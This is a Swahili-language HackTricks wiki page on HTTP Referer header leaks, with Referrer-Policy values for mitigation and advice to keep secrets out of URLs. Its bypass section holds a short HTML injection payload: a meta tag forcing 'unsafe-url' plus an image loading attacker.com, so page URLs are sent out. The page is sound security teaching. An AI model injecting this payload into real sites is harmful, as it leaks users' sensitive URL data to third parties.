mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
62 lines
3.4 KiB
Markdown
62 lines
3.4 KiB
Markdown
{% hint style="success" %}
|
|
Jifunze na zoea AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Jifunze na zoea GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
|
|
# Vichwa vya Rufaa na Sera
|
|
|
|
Rufaa ni kichwa kinachotumiwa na vivinjari kuonyesha ukurasa uliotembelewa kabla.
|
|
|
|
## Taarifa nyeti zilizovuja
|
|
|
|
Ikiwa kwa wakati fulani ndani ya ukurasa wa wavuti kuna taarifa nyeti iliyopo kwenye vigezo vya ombi la GET, ikiwa ukurasa una viungo kwa vyanzo vya nje au mshambuliaji anaweza kufanya/kupendekeza (ujanja wa kijamii) mtumiaji atembelee URL inayodhibitiwa na mshambuliaji. Inaweza kuweza kuchota taarifa nyeti ndani ya ombi la GET la hivi karibuni.
|
|
|
|
## Kupunguza Hatari
|
|
|
|
Unaweza kufanya kivinjari kifuatilie **Sera ya Rufaa** ambayo inaweza **kuzuia** taarifa nyeti kutumwa kwa programu zingine za wavuti:
|
|
```
|
|
Referrer-Policy: no-referrer
|
|
Referrer-Policy: no-referrer-when-downgrade
|
|
Referrer-Policy: origin
|
|
Referrer-Policy: origin-when-cross-origin
|
|
Referrer-Policy: same-origin
|
|
Referrer-Policy: strict-origin
|
|
Referrer-Policy: strict-origin-when-cross-origin
|
|
Referrer-Policy: unsafe-url
|
|
```
|
|
## Kupinga-Kupunguza
|
|
|
|
Unaweza kubadilisha sheria hii kwa kutumia lebo ya meta ya HTML (mshambuliaji anahitaji kutumia na kuingiza HTML):
|
|
```markup
|
|
<meta name="referrer" content="unsafe-url">
|
|
<img src="https://attacker.com">
|
|
```
|
|
## Ulinzi
|
|
|
|
Usiweke data yoyote nyeti ndani ya paramita za GET au njia katika URL.
|
|
|
|
{% hint style="success" %}
|
|
Jifunze na zoea AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Jifunze na zoea GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|